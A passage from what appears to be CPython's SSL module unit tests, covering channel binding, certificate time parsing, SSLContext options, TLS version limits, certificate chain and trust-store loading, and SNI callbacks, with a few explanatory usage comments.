server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
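# A minimal illustration (not part of the test suite) of how the options
# bitmask exercised above is usually manipulated; the OP_* names are the
# standard ssl module constants:
#
#     ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
#     ctx.options |= ssl.OP_NO_COMPRESSION        # set a flag
#     ctx.options &= ~ssl.OP_NO_COMPRESSION       # clear it again
#     enabled = bool(ctx.options & ssl.OP_NO_COMPRESSION)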
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
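# A short sketch (assuming OpenSSL 1.1.0g or newer, where the TLSVersion
# properties are available) of the typical way the attributes tested above
# are used to pin a context to TLS 1.2 or newer:
#
#     ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
#     ctx.minimum_version = ssl.TLSVersion.TLSv1_2
#     ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED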
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# combinations of flags are also accepted
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# OpenSSL has a fixed limit on the password buffer (PEM_BUFSIZE,
# generally 1 KB), so pass a password larger than that.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
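# As the assertions above exercise, the password argument to load_cert_chain()
# may be a str, bytes, bytearray, or a zero-argument callable returning one of
# those. A hedged usage sketch (file names and the environment variable are
# placeholders, not part of this suite):
#
#     ctx.load_cert_chain("cert.pem", "key.pem",
#                         password=lambda: os.environ["KEY_PASSPHRASE"])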
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
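# For reference, load_verify_locations() accepts three independent sources of
# trust anchors that may be combined: cafile (a PEM bundle file), capath (an
# OpenSSL c_rehash-style directory) and cadata (an in-memory PEM string or
# DER bytes); the cadata path is exercised by the next test.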
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
